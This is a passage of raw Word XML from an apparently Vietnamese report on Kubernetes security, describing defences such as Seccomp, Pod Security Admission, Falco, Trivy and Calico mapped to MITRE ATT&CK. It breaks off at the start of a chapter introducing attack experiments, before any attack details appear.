          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> chuẩn</w:t>
      </w:r>
      <w:r w:rsidRPr="00212603">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2AF916" w14:textId="00E22C28" w:rsidR="00212603" w:rsidRPr="00F133D8" w:rsidRDefault="00212603" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc233498121"/>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Phân tích đối chiếu theo Khung MITRE ATT&amp;CK® cho Container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="572A5282" w14:textId="49741F41" w:rsidR="00F134D9" w:rsidRPr="00FA4830" w:rsidRDefault="00F134D9" w:rsidP="00F134D9">
      <w:r w:rsidRPr="00FA4830">
        <w:t xml:space="preserve">Đối với kĩ thuật leo thang đặc quyền và lẩn tránh phòng thủ thông qua kỹ thuật "Escape to Host", giải pháp được triển khai bằng cách áp dụng cơ chế kiểm soát tại cổng vào (Admission Control) nhằm từ chối các cấu hình vi phạm, đồng thời thiết lập hồ sơ hệ thống an toàn như Seccomp hoặc AppArmor để vô hiệu hóa các System Calls nhạy cảm từ bên trong container. Để ứng phó với chiến thuật đánh cắp định danh (Credential Access) thông qua việc khai thác Service Account Token, đề án áp dụng nghiêm ngặt nguyên tắc đặc quyền tối thiểu ở tầng RBAC và tự động thu hồi cơ chế automountServiceAccountToken đối với các Pod không có chức năng gọi API nội bộ. Cuối cùng, đối với chiến thuật khám phá mạng thông qua kỹ thuật nghe lén </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4830">
        <w:lastRenderedPageBreak/>
        <w:t>(Network Sniffing), giải pháp được thực hiện bằng cách triển khai kiến trúc vi phân mảnh mạng (Micro-segmentation) ở Lớp 3 và Lớp 4, kết hợp với việc mã hóa đường truyền nhằm cô lập các vùng tin cậy của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053789E4" w14:textId="65E73ECC" w:rsidR="00212603" w:rsidRPr="00F133D8" w:rsidRDefault="00212603" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc233498122"/>
      <w:r w:rsidRPr="00F133D8">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cơ sở khoa học của công nghệ eBPF (Extended Berkeley Packet Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00F133D8">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="0224D4C7" w14:textId="06C6AF42" w:rsidR="00F134D9" w:rsidRPr="00015A3E" w:rsidRDefault="00F134D9" w:rsidP="00F134D9">
      <w:bookmarkStart w:id="32" w:name="_Toc233498123"/>
      <w:r w:rsidRPr="00015A3E">
        <w:t xml:space="preserve">Đề án sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="00015A3E">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00015A3E">
        <w:t xml:space="preserve"> làm công nghệ lõi cho giám sát runtime thay vì các Agent cồng kềnh, nhằm tối ưu hiệu năng và độ trễ . eBPF thực thi mã giám sát trực tiếp trong không gian nhân (Kernel Space) một cách an toàn nhờ bộ kiểm duyệt (Verifier) và biên dịch Just-In-Time (JIT), cho phép bắt chặn các lệnh gọi hệ thống (syscalls) ngay khi phát sinh với tốc độ gần như tức thời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21708A3A" w14:textId="3AF91EF1" w:rsidR="00212603" w:rsidRPr="00F133D8" w:rsidRDefault="00212603" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Giải pháp công nghệ giai đoạn Tích hợp và Phân phối (Build &amp; Ship)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="543F73D2" w14:textId="5CD34316" w:rsidR="00F134D9" w:rsidRPr="00F134D9" w:rsidRDefault="00F134D9" w:rsidP="00F134D9">
      <w:bookmarkStart w:id="33" w:name="_Toc233498124"/>
      <w:r w:rsidRPr="00F134D9">
        <w:t>Trivy là công cụ rà quét lỗ hổng (CVE), cấu hình sai và dữ liệu nhạy cảm (secrets) đa tầng, được tối ưu cho CI/CD nhờ cơ chế vận hành siêu nhẹ và không lưu trạng thái . Đề án sử dụng Trivy kết hợp kỹ thuật Multi-stage build và Distroless Images (loại bỏ shell/package manager) để làm sạch phần mềm ngay từ khâu đóng gói, khiến các kỹ thuật tiêm lệnh (Command Injection) thất bại do thiếu trình thông dịch thực thi .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06133402" w14:textId="22F60C38" w:rsidR="00212603" w:rsidRPr="00F133D8" w:rsidRDefault="00212603" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Giải pháp công nghệ phòng thủ chủ động tầng Thực thi (Runtime)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="480C1933" w14:textId="1B598A3D" w:rsidR="00F134D9" w:rsidRPr="00F134D9" w:rsidRDefault="00F134D9" w:rsidP="00F134D9">
      <w:bookmarkStart w:id="34" w:name="_Toc233498125"/>
      <w:r w:rsidRPr="00F134D9">
        <w:t>Hệ thống sử dụng Pod Security Admission (PSA) cấp độ Restricted để tự động chặn các cấu hình nguy hiểm như privileged hoặc hostPath tại Kubernetes API Server. Đồng thời, việc ép buộc sử dụng hồ sơ Seccomp giúp chèn bộ lọc BPF vào tiến trình để từ chối các System Calls nhạy cảm (như mount, chroot), từ đó vô hiệu hóa hoàn toàn kỹ thuật Container Escape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62729ECF" w14:textId="018BD20C" w:rsidR="00D94C11" w:rsidRPr="00F133D8" w:rsidRDefault="00D94C11" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Giám sát hành vi độ trễ cực thấp với Falco (eBPF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="65133C51" w14:textId="1426123F" w:rsidR="00F134D9" w:rsidRPr="00FA4830" w:rsidRDefault="00F134D9" w:rsidP="00F134D9">
      <w:r w:rsidRPr="00FA4830">
        <w:t xml:space="preserve">Đề án triển khai Falco – tiêu chuẩn công nghiệp của CNCF – để giám sát runtime thời gian thực nhờ công nghệ eBPF. Falco hoạt động như "camera an ninh tàng hình", liên tục phân tích các lời gọi hệ thống (syscalls) để phát hiện tức thời các hành vi xâm nhập tinh vi như Reverse Shell hay nỗ lực leo thang đặc quyền mà các biện pháp tĩnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4830">
        <w:lastRenderedPageBreak/>
        <w:t>thường bỏ lọt. Khi phát hiện bất thường, Falco sử dụng eBPF hook để chụp lại các tham số syscall và đối chiếu với bộ quy tắc, đảm bảo chốt chặn an ninh cuối cùng cho hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2665C4FF" w14:textId="77777777" w:rsidR="006F4E96" w:rsidRPr="00F133D8" w:rsidRDefault="006F4E96" w:rsidP="00F133D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc233498126"/>
      <w:r w:rsidRPr="00F133D8">
        <w:t>Vi phân mảnh mạng với Calico CNI (Chống kịch bản TN-03)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="7F80FAF2" w14:textId="137A71FD" w:rsidR="00F134D9" w:rsidRPr="00F134D9" w:rsidRDefault="00F134D9" w:rsidP="00F134D9">
      <w:bookmarkStart w:id="36" w:name="_Toc233498127"/>
      <w:r w:rsidRPr="00F134D9">
        <w:t>Để khắc phục rủi ro từ mạng phẳng mặc định, đề án thay thế bằng Calico CNI sử dụng giao thức BGP và eBPF datapath để định tuyến trực tiếp. Đồng thời, hệ thống thiết lập kiến trúc Zero-Trust, mặc định từ chối mọi lưu lượng (Deny-All) và chỉ cho phép giao tiếp thông qua danh sách dịch vụ được cấp phép (Allow-List).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:p w14:paraId="6C7BEE0A" w14:textId="2A33B98A" w:rsidR="008E01AC" w:rsidRDefault="003D12D0" w:rsidP="003D12D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D12D0">
        <w:t>Kết luận c</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hương</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77DC4ADA" w14:textId="77777777" w:rsidR="002B5979" w:rsidRPr="002B5979" w:rsidRDefault="002B5979" w:rsidP="002B5979">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B5979">
        <w:t>Chương 3 đã đề xuất và chứng minh tính hiệu quả của mô hình phòng thủ đa lớp (Defense-in-Depth) theo chu trình DevSecOps, với trọng tâm là kiến trúc Zero-Trust. Bằng cách kết hợp hài hòa các công cụ bảo mật tĩnh (Trivy, Harbor) và phòng thủ runtime chủ động (Seccomp, Falco, Calico), giải pháp đã tạo ra một "vòng lặp bảo mật kín", giúp ngăn chặn từ các mối đe dọa đã biết đến những kỹ thuật tinh vi như tấn công 0-day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C0E44" w14:textId="31A3E6DC" w:rsidR="00671F8E" w:rsidRPr="00B3514A" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3514A">
        <w:t>THỰC NGHIỆM PHƯƠNG THỨC TẤN CÔNG VÀ PHÂN TÍCH VÉC-TƠ XÂM NHẬP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC3D8B" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc233498101"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="13D1B41F" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00491C76" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chương</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xây</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dựng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>môi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>phòng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thí</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nghiệm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hiện</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kịch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bản</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tấn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>công</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giả</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PoC), bao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gồm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thoát</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chuồng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chiếm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quyền</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đánh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cắp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>danh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Account </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nghe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lén</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nội</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bộ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quả</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>từ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nghiệm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cơ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sở</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00491C76">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
